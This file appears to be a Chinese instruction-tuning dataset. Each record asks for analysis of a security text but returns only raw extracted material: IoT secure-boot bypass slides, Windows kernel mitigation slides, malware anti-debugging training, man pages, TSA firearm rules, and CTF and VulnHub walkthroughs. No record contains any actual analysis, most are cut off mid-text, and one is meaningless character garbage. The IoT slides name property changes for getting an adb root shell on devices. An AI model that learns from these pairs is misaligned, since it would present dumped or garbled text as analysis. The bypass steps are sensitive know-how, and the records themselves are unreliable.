{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n你的智能硬件出卖了你的信息 浅谈办公及教育场景硬件供应链安全 0 1 议程  IoT产品供应链的安全现状  常见的保护机制及实现缺陷  如何避免缺陷保护供应链安全 0 4 IoT产品供应链安全现状 金立2千多部手机被植入木马 软件供应链攻击易受关注而 硬件供应链在流通环节的攻击 非常容易被忽视 0 5 IoT产品供应链安全现状 国内外的相关规范 0 7 IoT产品供应链安全现状 业界的做法 主流的桌面处理器服务器 笔电操作系统厂商很早就 实现了安全启动可信计算等 机制 0 8 IoT产品供应链安全现状 移动处理器厂商 高通MTK等IoT 常用方案厂商都提 供了完整的 SecureBootTEE 的实现支持提供 了可靠的保护机制 0 9 在我们的研究中累计发现5个头部厂商的9款IoT产品芯片方案有完整 的安全启动支持存在设计缺陷导致产品可以在供应链流通环节被 植入恶意代码 IoT产品供应链安全现状 实际落实到IoT产品端的情况 IoT产品供应链安全现状 10 攻击需要物理接触 厂商不重视不认可 只是缺陷不是漏洞 IoT产品供应链安全现状 11 复杂的供应链网络导 致产品在到达客户之前 的流通环节存在大量 被供应链植入的时间窗 口 虽是缺陷后果严重 12 智能盒子 智能电视 会议终端 IoT产品供应链安全现状 虽是缺陷后果严重 窃取商业机密 13 IoT产品供应链安全现状 虽是缺陷后果严重 没有安全保护的教 育硬件可能被破 解改变产品原有设 计用途变身为游 戏机浏览不良信 息的媒介等 14 智能音箱 智能教育屏 智能学习灯 IoT产品供应链安全现状 虽是缺陷后果严重 监控家庭敏感地带 15 IoT产品供应链安全现状 某教育产品供应链植 入风险演示 16 常见的保护机制及实现缺陷 常见的保护机制及实现缺陷 17 Android ROM 常见的保护机制及实现缺陷 18 Secure Boot 核心思想当前阶段的启动代码加载下一级代码之前对 所加载的代码基于PKI进行完整性校验 常见的保护机制及实现缺陷 19 信任根 所有支持 Secure Boot的CPU都会有 一块很小的OTP储存也称为 FUSE 或者eFUSE它的工作原理跟现实中 的保险丝类似在芯片出厂之前会 被写入信息一旦被写入便无法被 更改 常见的保护机制及实现缺陷 22 DM-Verity  对于小分区会使用信 任根进行直接或间接签 名的  对于较大的分区比如 system分区与预置的 root hash进行比对验证 常见的保护机制及实现缺陷 23 信任根 -> Boot Verify -> DM Verity 牢不可破 常见的保护机制及实现缺陷 25 绕过 SECURE BOOT 90%以上均未烧写eFuse 可以直接绕过 虽然安全启动没开但是 从BootLoader向下的保护 机制可能是开启的需要 拿到固件分析保护逻辑 常见的保护机制及实现缺陷 26 没有开启安全启动 利用芯片厂商工具读写整个磁盘固件MTK 绕过 SECURE BOOT 常见的保护机制及实现缺陷 27 没有开启安全启动 利用芯片厂商工具 读写整个磁盘固件  QUALCOMM3 绕过 SECURE BOOT 常见的保护机制及实现缺陷 28  frp  seccfg seccfg结构体 seccfg body 结构体 通过固件分析绕过Boot Verify 常见的保护机制及实现缺陷 29 通过固件分析绕过Boot Verify 常见的保护机制及实现缺陷 30 通过固件分析绕过DM-Verity 常见的保护机制及实现缺陷 31 使能adb 禁用SE-Linux 获取 adb root shell set property ro.debuggable = 1  androidboot.selinux=permissive ro.secure = 0 Gain Full Access Get Full Access 常见的保护机制及实现缺陷 32 某会议盒子供应链植入风险 演示 33 如何避免缺陷保护供应链安全 如何避免缺陷保护产品安全 35  安全意识认为接触式攻击不属于漏洞  芯片成本支持安全启动的芯片增加成本  研发成本不想在保护机制上投入人力物力  维修成本开启安全启动增加维修难度 部分厂商的现状 提高安全意识将安全特性支持考虑到产品基础成本里 如何避免缺陷保护产品安全 36  采用巧妙的后门隐藏调试开关  对控制调试的程序进行混淆加密增加分析成本  在底层Framework上定制程序的安装逻辑对抗植入 部分厂商的保护方案 完美的保护机制也需要在根源上做到安全 如何避免缺陷保护产品安全 34 需求 设计 EVT DVT PVT 售卖 硬件产品不同阶段的缺陷修复需要付出的代价 安全应该尽早的介入到 硬件产品", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH HOSTID 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 hostid \\- 显示当前主机的数字标识符 .SH 概述 \\fBhostid\\fP [\\fI\\,选项\\/\\fP] .SH 描述 .\\\" Add any additional description here .PP 显示当前主机的数字标识符十六进制 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 Jim Meyering 编写 .SH 报告错误 GNU coreutils 的在线帮助<https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 \\fBgethostid\\fP(3) .PP .br 完整文档请见 <https://www.gnu.org/software/coreutils/hostid> .br 或者在本地使用 info \\(aq(coreutils) hostid invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# quackme Reversing, 200 points ## Description: > Can you deal with the Duck Web? Get us the flag from this program. A binary was attached. ## Solution: Let's run the supplied binary: ```console root@kali:/media/sf_CTFs/pico/quackme# ./main You have now entered the Duck Web, and you're in for a honkin' good time. Can you figure out my trick? test That's all folks. ``` Not to much to work with. The next step is launching a disassembler: ```assembly root@kali:/media/sf_CTFs/pico/quackme# r2 main -- Beer in mind. [0x080484e0]> aa [x] Analyze all flags starting with sym. and entry0 (aa) [0x080484e0]> afl 0x08048400 3 35 sym._init 0x08048440 1 6 sym.imp.getline 0x08048450 1 6 sym.imp.__stack_chk_fail 0x08048460 1 6 sym.imp.malloc 0x08048470 1 6 sym.imp.puts 0x08048480 1 6 sym.imp.exit 0x08048490 1 6 sym.imp.strlen 0x080484a0 1 6 sym.imp.__libc_start_main 0x080484b0 1 6 sym.imp.setvbuf 0x080484c0 1 6 sym.imp.memset 0x080484d0 1 6 fcn.080484d0 0x080484e0 1 33 entry0 0x08048510 1 4 sym.__x86.get_pc_thunk.bx 0x08048520 4 43 sym.deregister_tm_clones 0x08048550 4 53 sym.register_tm_clones 0x08048590 3 30 sym.__do_global_dtors_aux 0x080485b0 4 43 -> 40 entry1.init 0x080485db 6 103 sym.read_input 0x08048642 10 211 sym.do_magic 0x08048715 1 87 sym.main 0x08048770 4 93 sym.__libc_csu_init 0x080487d0 1 2 sym.__libc_csu_fini 0x080487d4 1 20 sym._fini [0x080484e0]> s sym.main [0x08048715]> pdf ;-- main: / (fcn) sym.main 87 | sym.main (int argc, char **argv, char **envp); | ; var int local_4h @ ebp-0x4 | ; arg int arg_4h @ esp+0x4 | ; DATA XREF from entry0 (0x80484f7) | 0x08048715 8d4c2404 lea ecx, [arg_4h] ; 4 | 0x08048719 83e4f0 and esp, 0xfffffff0 | 0x0804871c ff71fc push dword [ecx - 4] | 0x0804871f 55 push ebp | 0x08048720 89e5 mov ebp, esp | 0x08048722 51 push ecx | 0x08048723 83ec04 sub esp, 4 | 0x08048726 a144a00408 mov eax, dword [obj.stdout__GLIBC_2.0] ; [0x804a044:4]=0 | 0x0804872b 6a00 push 0 | 0x0804872d 6a02 push 2 ; 2 | 0x0804872f 6a00 push 0 | 0x08048731 50 push eax | ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Stepping p3wns Adventures in full-spectrum Embedded Exploitation And Defense 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Our Typical Talk 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Our Typical Talk 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Our Typical Talk 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Our Typical Talk 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Our Typical Talk 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Our Typical Talk 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Our Typical Talk 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Professor, Columbia University Co-Founder, Red Balloon Security 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Research Scientist, Red Balloon Security Fashionisto Extraordinaire 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Research Scientist, Red Balloon Security 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Local Man 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 Cisco Bug ID  CSCui04382 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 8/1/13 Cui, Costello, Kataria, Stolfo, Blackhat USA 2013 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMJ0011 th_decoder@126.com Reversing Windows8: Interesting Features of Kernel Security 1 Goal: Revising Windows 8 Release Preview Find new security features to defend or mitigate kernel vulnerability attack Target: ntoskrnl Tools: IDA Pro/Hex-rays/windbg Agenda 2  Disable Null Page Memory Allocation  Disable Win32k System Call  Security Failure Interrupt  Nonexecutable NonPaged Pool  Apply Intel Secure Key Technology  Apply Intel SMEP Technology Agenda 3  Null-page memoryfor 16bit VM:ntvdm  Allocate null-page memory by using ZwAllocateVirtualmemory to Trigger uninitialized object pointer reference vulnerability or to achieve other vulnerability attack  Example CVE-2010-4398 N-Protect TKRgAc2k.sys kernel 0day(POC2010)  Now the system disallow low address (0x0~0x10000) allocation in Windows8  EPROCESS->Flags.VdmAllowed Disallow Null Page Allocation 4  16bit virtual machine is disabled by default in windows8, only administrators can enable it Disallow Null Page Allocation 5  Windows8 checks all the locations to which null page can be allocated.  MiCreatePebOrTebcreate peb or teb  MiMapViewOfImageSection->MiIsVaRangeAvailable: Mapping image section  MiMapViewOfDataSection/MiMapViewOfPhysicalSection Mapping data/physical section  MmMapLockedPagesSpecifyCache/MmMapLockedPages-> MiMapLockedPagesInUserSpace  Mapping in user address space  NtAllocateVirtualMemory:Allocate process memory Disallow Null Page Allocation 6 Disallow win32k system call  EPROCESS->Flags2.DisallowWin32kSystemCalls  KiFastCallEntry(2)->PsConvertToGuiThread Disallow win32k system call 7  Why disallow win32k system call  Win32k.sys: a high incidence of windows kernel vulnerability, can be called without process privilege control  MS11-087 Trojan.win32.Duqu : win32k.sys font parse vulnerability  Current application sandbox defense method  Job UI restriction (ineffective)  Disallowing win32k system call can easily defend any win32k related 0day without using 3rd party kernel driver  Also can defense user/g", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 3 Understanding and countering malwares evasion and self-defence https://github.com/hasherezade/malware_training_vol1 Fingerprinting for evasion Fingerprinting for evasion  Fingerprinting = gathering information about the environment where the executable was deployed  It is used by malware to determine whether it is deployed in a controlled enviromnent, i.e. sandbox, analysis machine  Open source projects with rich sets of techniques:  https://github.com/a0rtega/pafish  https://github.com/LordNoteworthy/al-khaser  https://www.aldeid.com/wiki/ScoopyNG  Presented demos you can find at:  https://github.com/hasherezade/antianalysis_demos Fingerprinting for evasion  PaFish in action: https://github.com/a0rtega/pafish Fingerprinting for evasion  Al-Khaser in action: https://github.com/LordNoteworthy/al-khaser Fingerprinting for evasion  Most of the malware stop their execution once they observe being analyzed  thats how they protect their real mission from being revealed. Common reactions:  ExitProcess  Infinite sleep loop  Some malware are more tricky, and:  deploy a decoy (i.e. an old variant of Andromeda)  corrupt their execution (i.e. Kronos) to crash at further point Classic debugger detection techniques Anti-debugger: the classic set  The fact that the application is being debugged leaves some artefacts in the execution environment  Malware tries to pick them up, and terminate or alter execution on such event  There is a list of classic, well-known techniques, that malware authors keep using from years, and probably will keep using in the future  Lets take a look at them... Anti-debugger: approaches  Using flags in internal process structures: EPROCESS, PEB  Some of those checks can be invoked via APIs  Breakpoint detection  Reaction on exceptions  Time checks  Searching for the physical presence of the debugger in the system: checking running processes, windows names/classes, installation artifacts of a debugger Detecting debugger: basic API The most basic m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn#$Forensics,AF, @dualcoremusic, mov$eax,$0x6b;$int$0x80$  Rapper,  Some,other,stuff,idk, Overview,  Memory,Forensics,vs,SMC*,  Windows,  Linux,  Android,(An#$)Forensics,  Fun,with,SD,cards, Disclaimers,  !Professional,  TROLOLOLOL,  !Expert,/,YMMV,  DO,ILLEGAL,THINGS, , Memory,Forensics,  Focus,on,soSware,protec#on,(malware),  Persist,,thwart,detec#on,  Inhibit,acquisi#on,and,analysis, , Memory,Forensics,  All,the,cool,stuff,happens,in,memory,  Loading,from,disk,  Why,cant,I,hold,all,these,sec#ons?, , Memory,Forensics,  No,longer,referenced,,no,longer,needed,  Analysis,tools,madbro,  Lots,of,fun,to,be,had, , Memory,Forensics,  Demo,  thekeysarelikerightnexZoeachother.exe,  Rekall,(winpmem), , <tatclass> YOU ALL SUCK DICK <tatclass> er. <tatclass> hi. <andy\\code> A common typo. <tatclass> the keys are like right next to each other. Memory,Forensics,  PE,header,not,needed,aSer,loading,  Zero,the,header,(RtlZeroMemory),  Process,con#nues,to,run,  Analysis,tools,fail,  Win:,,XP,,,,,,10, , Memory,Forensics,  Completeness:, , winpmem92.1.post4.exe$9o$lol.aff4$ $ \"C:\\Program$Files\\Rekall\\rekal.exe\"$9f$lol.aff4$ $ >$procdump$proc_regex=\"thekeys\",$$ $$$$dump_dir=\"C:/Users/int0x80/Desktop/\"$ Memory,Forensics,  Demo,  thekeysarelikerightnexZoeachother$linux,  LiME,  Vola#lity, , Memory,Forensics,  ELF,header,not,needed,aSer,loading,  Zero,the,header,(memset),  Process,con#nues,to,run,  Analysis,tools,fail, , Memory,Forensics,  Completeness:, , git$clone$https://github.com/504ensicsLabs/LiME$ $ cd$LiME/src/$ $ make$ $ sudo$insmod$./lime9$(uname$r).ko$\\$ $$\"path=/tmp/lol.lime$format=lime\"$ Memory,Forensics,  Completeness:, , git$clone$https://github.com/ volatilityfoundation/volatility$ $ cd$volatility/$ $ sudo$python$setup.py$install$ Memory,Forensics,  Completeness:, , cd$tools/linux/$ $ make$ $ head$module.dwarf$ $ .debug_info$ ...$ Memory,Forensics,  Completeness:, , sudo$zip$\\$$ $$volatility/plugins/overlays/linux/Ubuntu1604.zip$\\$ $$tools/linux/module.dwarf$\\$ $$/boot/Syst", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFlying With Firearms Domestic Laws & Policies from the TSAs Prohibited Items list http://www.tsa.gov/travelers/airtravel/prohibited/permitted-prohibited-items.shtm Ammunition - Check with your airline or travel agent to see if ammunition is permitted in checked baggage on the airline you are flying. If ammunition is permitted, it must be declared to the airline at check-in. Small arms ammunitions for personal use must be securely packed in fiber, wood or metal boxes or other packaging specifically designed to carry small amounts of ammunition. Ask about limitations or fees, if any, that apply. Firearms - firearms carried as checked baggage MUST be unloaded, packed in a locked hard sided container to which no one else has a key, and declared to the airline at check-in. Flare Guns - May be carried as checked baggage MUST be unloaded, packed in a locked hard sided container to which no one else has a key, and declared to the airline at check-in. All of the above may not be kept in carry-on luggage but are acceptable in checked bags. While conventional ammunition (as seen above) is legal in checked baggage, flares may not be in ones luggage at all. Also totally not permitted are un-loaded propellants (gunpowder, black powder, percussion caps) unless they are part of loaded cartridges properly packed according to the above regulations. from the TSAs Firearms & Ammunition guidance page http://www.tsa.gov/travelers/airtravel/assistant/editorial_1666.shtm  You must declare all firearms to the airline during check-in.  Firearms must be unloaded.  Firearms must be packed in hard-sided containers.  Said containers must be locked. A locked container is defined as one that completely secures the firearm from access by anyone other than you.  If you are not present and a security officer must open the container, we or the airline will make a reasonable attempt to contact you.  You must securely pack any ammunition in fiber (such as cardboard), wood, or metal boxes or other packag", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n10 Things That Are Pissing Me Off RenderMan, Church of Wifi Caution: The first 3 rows may get wet 10 Things That Are Pissing Me Off  There's a lot more, but we're sticking to Hacker related ones  This is cheaper than therapy  Got so pissed off I'm doing something about some of them, others I need help  Save discussion till afterwards, I only have 20 minutes #1 WPA-RADIUS Documentation #1 WPA-RADIUS Documentation  Been saying 'use WPA-RADIUS' for best security for years  Ever tried to set it up open source?  No two sets of documentation is the same  Every distro a little different  Took me weeks to get something running  How is Joe IT guy supposed to do it if I can't? #1 WPA-RADIUS Documentation  Decided to write generic laymans instructions  Distro, vendor generic instructions for building a small WPA-RADIUS system  Maybe a Wiki for others to submit their own changes and notes about different systems, scripts, ideas, etc.  Every AP supports it, why is'nt it being used; Because it's confusing as hell. #2 Ideas Dying a Horrible Death #2 Ideas Dying a Horrible Death  Like many, I have random ideas  Some better than others  Some need to be made into products for the greater good  i.e. Wedding photo download station #2 Ideas Dying a Horrible Death  Got married in the spring, wanted as many photo's as possible. Most guests had digital cameras  In a moment of brilliance, setup laptop w/ 25-in- one card reader, got everyones pics as they left, an extra 1000 photo's  Some simple refinements could make a good product to sell to wedding planners and photographers. Put me down for 10% gross  Need to talk more and not hoard ideas #3 Lack of Tool Evolution #3 Lack Of Tool Evolution  So many useful wireless (and other) tools never develop beyond proof-of-concept  Airpwn, Karma, Void11  I can't code so I can't fix it  I can bribe though! #3 Lack of Tool Evolution  Wireless Village project  Posted development I think needs to be tackled and reward milestones, feel free to exceed goa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" -*- nroff -*- .\\\" Copyright 1993, 1994, 1995 by Theodore Ts'o. All Rights Reserved. .\\\" This file may be copied under the terms of the GNU Public License. .\\\" .TH FSCK 8 \"July 2003\" \"E2fsprogs version 1.34\" .SH NAME fsck \\- 检查并修复Linux文件系统 .SH 总览 SYNOPSIS .B fsck [ .B \\-sACVRTNP ] [ .B \\-t .I fstype ] .I [filesys ... ] [\\-\\-] [ .B fs-specific-options ] .SH 描述 DESCRIPTION .B fsck 通常用来检查并适当修复一个或多个Linux文件系统. .I filesys 可以是一个设备名(例如: .IR /dev/hdc1 \", \" /dev/sdb2 ), 一个挂载点(例如: .IR / \", \" /usr \", \" /home ), 或一个ext2文件系统的磁盘标签, 也可以是UUID指定符(例如: UUID=8868abf6-88c5-4a83-98b8-bfc24057f7bd 或 LABEL=root). 通常 .B fsck 会试着以并行的方式同时在不同的物理磁盘上运行文件系统检查这样可以减少对所有文件系统进行检查的时间 .PP 如果没有在命令行指定文件系统并且没有指定 .B \\-A 选项 .B fsck 将默认顺序地检查 .B /etc/fstab 中登记的文件系统这和使用 .B \\-As 选项是相同的 .PP .B fsck 退出的返回值是下列情况之和 .br \\ 0\\ \\-\\ 没有错误 .br \\ 1\\ \\-\\ 文件系统有错但已修复 .br \\ 2\\ \\-\\ 系统应当重启 .br \\ 4\\ \\-\\ 文件系统错误没有修复 .br \\ 8\\ \\-\\ 运行错误 .br \\ 16\\ \\-\\ 用法或语法错误 .br \\ 32\\ \\-\\ 用户撤销了fsck 操作 .br \\ 128\\ \\-\\ 共享库出错 .br 当检测多个文件系统时退出的返回值是对每个文件系统检查的返回值按位或的结果 .PP 实际上 .B fsck 只是Linux 中不同的文件系统检查器(\\fBfsck\\fR.\\fIfstype\\fR)的一个前端首先它在 .I /sbin 中搜索特定文件系统的检查器然后在 .I /etc/fs 和 .IR /etc 中搜索最后在 PATH 环境变量中列出的路径中搜索请查看特定文件系统的检查器的手册页来获取细节信息 .SH 选项 OPTIONS .TP .B \\-s 顺序地进行 .B fsck 操作如果你要检查多个文件系统并且检查器运行在交互模式这样作比较有好处(注意: .BR e2fsck (8) 默认是以交互方式运行的要使 .BR e2fsck (8) 以非交互方式运行你必须指定 .B \\-p 和 .B \\-a 选项如果你想要自动纠正错误或 .B \\-n 选项如果不想自动纠正错误) .TP .BI \\-t \" fslist\" 指定要检查的文件系统的类型当指定了 .B \\-A 标志时只有 .I fslist 中列出的类型的文件系统会被检查 .I fslist 参数是一个以逗号分隔的文件系统类型列表以及选项说明符可以在这个以逗号分隔的列表的所有文件系统前面加上否定前缀 .RB ' no ' 或 .RB ' ! ' 来使得只有没有列在 .I fslist 中的文件系统将被检查如果并非 .I fslist 中列出的所有文件系统都加上了否定前缀那么只有 .I fslist 中列出的文件系统将被检查 .sp 选项说明符也可能包含在这个以逗号分隔的列表 .IR fslist 中它们的格式是 .BI opts= fs-option\\fR 如果出现了选项说明符那么只有在 .B /etc/fstab 中它们的挂载选项字段中不包含 .I fs-option 的文件系统将被检查 如果选项说明符有否定前缀那么只有在 .B /etc/fstab 中它们的挂载选项字段中包含 .I fs-option 的文件系统将被检查 .sp 例如如果 .IR fslist 中出现了 .B opts=ro 那么只有 .B /etc/fstab 中挂载选项包含 .B ro 的文件系统将被检查 .sp 为了和Mandrake 发行版兼容(它的启动脚本依赖于一个未经许可而对 .B fsck 程序用户接口作出的改变)如果 .IR fslist 中有一个 .B loop 文件系统它被视为指定了 .B opts=", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n! \" # $ % &' ( ) * * * + , - - . / 0 ! \" 1 2 3 0 4 5 $ \" 2 6 7 8 \" 2 0 ! % 9 % $ 8 : 8 ; : % % ! < 8 ' % = : 8 ; : % % \" 2 9 ! 8 8 2 9 % > 0 ! 8 ? 1 ' 0 ; ! 8 4 \" 2 % ! \" @ 1 % 8 \" % 0 ; 4 A ! B 4 \" 9 \" % 1 ; 4 8 ! % $ 8 % 8 ! B 2 9 % $ 8 C D E C 8 ; 8 ! 0 7 F 1 @ 7 \" ' G \" ' 8 ; 2 8 0 2 1 @ 7 \" 2 $ 8 4 @ % $ 8 H ! 8 8 I 9 % > 0 ! 8 H 1 ; 4 0 % \" ; ? 8 \" % $ 8 ! J 8 ! 2 \" ; , 9 % $ 8 G \" ' 8 ; 2 8 K ! &0 % 1 ! % \" ; ( 0 ; 7 0 % 8 ! J 8 ! 2 \" ; = L M N O P Q R Q S P T U V W X Y Z [ \\ V ]  _ _ ` a _ b a _ c _  O  \\ O _ b S W d U S e Y d L f g h i  j k l i m k  n o k  i p q p r s t t u v w t x y t z { | x z } ~ } ~ }                         I 1 ! % 8 4  1 2 5 8 2   F  K F   K  I :           I 1 ! % 8 4  1 2 5 8 2            I 1 ! % 8 4  1 2 5 8 2         I 1 ! % 8 4  1 2 5 8 2                   I 1 ! % 8 4  1 2 5 8 2                         I 1 ! % 8 4  1 2 5 8 2                   I 1 ! % 8 4  1 2 5 8 2   F  K F   K  I : K  D  K % $ 8 !                    I 1 ! % 8 4  1 2 5 8 2   I :     ª                I 1 ! % 8 4  1 2 5 8 2   I : ) p q      t s  { ² ³  s  µ    z } ~  ~ }                  ¹       } ~  ~           º   ¼          ½   ¹       ¾              À  Á  j o k  i  q p r s t t u v w t x    s  t   à  Ä ² s t Å         q      t s  { ² ³   à  Ä ² s t Æ      Ç Æ ª È  ¹        É  Ê   Ë È È              ~    È    Ì       Í Ç Î              ¹         Ï Ð         Ê Ñ   Ò  Ó i i Á  Ô i Ò Ô Õ q p     t s  { ² ³  s  µ    z ½  Æ     Ì        ¹  Ì   ,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# InsanityHosting > https://download.vulnhub.com/insanity/Insanity-Hosting.ova 靶场IP`192.168.2.134` 扫描对外端口服务 ``` (rootkali)-[~] # nmap -p1-65535 -sV 192.168.2.134 Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-06 08:23 EDT Nmap scan report for 192.168.2.134 Host is up (0.00024s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.2.33) MAC Address: 00:0C:29:C2:09:42 (VMware) Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 154.26 seconds ``` 访问FTP 21端口可以匿名登陆不过没有发现有用的东西 ![image-20220906202733029](../../.gitbook/assets/image-20220906202733029.png) 浏览器访问80端口 ![image-20220906202639244](../../.gitbook/assets/image-20220906202639244.png) 爆破目录 ``` (rootkali)-[~] # gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.2.134/ =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.2.134/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/09/06 08:28:58 Starting gobuster in directory enumeration mode =============================================================== /.htaccess (Status: 403) [Size: 211] /.htpasswd (Status: 403) [Size: 211] /cgi-bin/ (Status: 403) [Size: 210] /css (Status: 301) [Size: 233] [--> http://192.168.2.134/css/] /data (Status: 301) [Size: 234] [--> http://192.168.2.134/data/] /fonts (Status: 301) [Size: 235] [--> http://192.168.2.134/fonts/] /img (Status: 301) [Size: 233] [--> http://192.168.2.134/img/] /js (Status: 301) [Size: 232] [--> http:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Can You Hear Me? Category: Forensics, 50 Points ## Description > I think I heard something. I'm pretty sure it was around 3:00 pm... A binary file was attached. ## Solution Let's check the binary file: ```console root@kali:/media/sf_CTFs/matrix/Can_You_Hear_Me# file Can_You_Hear_Me Can_You_Hear_Me: data root@kali:/media/sf_CTFs/matrix/Can_You_Hear_Me# binwalk Can_You_Hear_Me DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- ``` Noting much to see here. Let's take a look at the binary: ```console root@kali:/media/sf_CTFs/matrix/Can_You_Hear_Me# xxd -g 1 Can_You_Hear_Me | head 00000000: f3 ff c4 44 00 00 03 00 00 48 00 00 17 00 91 05 ...D.....H...... 00000010: 03 f6 04 b8 63 60 32 13 87 e6 8a a1 48 06 7e 99 ....c`2.....H.~. 00000020: 5e fd 43 af c5 10 b1 62 ca e3 20 6b 00 00 83 00 .C....b.. k.... 00000030: 82 8b 2e 0e 2e 1f 70 fe 3e b8 13 7c de 07 fe 53 ......p.>..|...S 00000040: 40 90 0c 10 81 44 ff 8f ff ff a3 fc 00 b1 0f 3e @....D.........> 00000050: 0a c1 f0 c1 0e fa 61 05 70 a0 b3 22 65 8c 4e 5f ......a.p..\"e.N_ 00000060: f3 ff c4 44 11 53 79 e8 01 f0 10 4f 63 00 e7 a5 ...D.Sy....Oc... 00000070: 32 a3 d3 c9 4e 82 0e 73 9a c5 cb b8 63 f4 aa 08 2...N..s....c... 00000080: f8 61 9b 16 2f 1d 81 9c 8f 73 cb 02 90 ad 34 45 .a../....s....4E 00000090: 15 10 58 a8 59 58 84 58 de 68 a4 c9 a0 93 ac 1a ..X.YX.X.h...... ``` Nothing jumps to the eye, but if we take a closer look we can see a pattern starting with `f3 ff c4 44`. Is this the prefix for some kind of record? We'll align the binary differently and inspect it again: ```console root@kali:/media/sf_CTFs/matrix/Can_You_Hear_Me# xxd -g 1 -c 96 Can_You_Hear_Me | head 00000000: f3 ff c4 44 00 00 03 00 00 48 00 00 17 00 91 05 03 f6 04 b8 63 60 32 13 87 e6 8a a1 48 06 7e 99 5e fd 43 af c5 10 b1 62 ca e3 20 6b 00 00 83 00 82 8b 2e 0e 2e 1f 70 fe 3e b8 13 7c de 07 fe 53 40 90 0c 10 81 44 ff 8f ff ff a3 fc 00 b1 0f 3e 0a c1 f0 c1 0e fa 61 05 70 a0 b3 22 65 8c 4e 5", "category": "text_analysis", "source": "security_papers"}
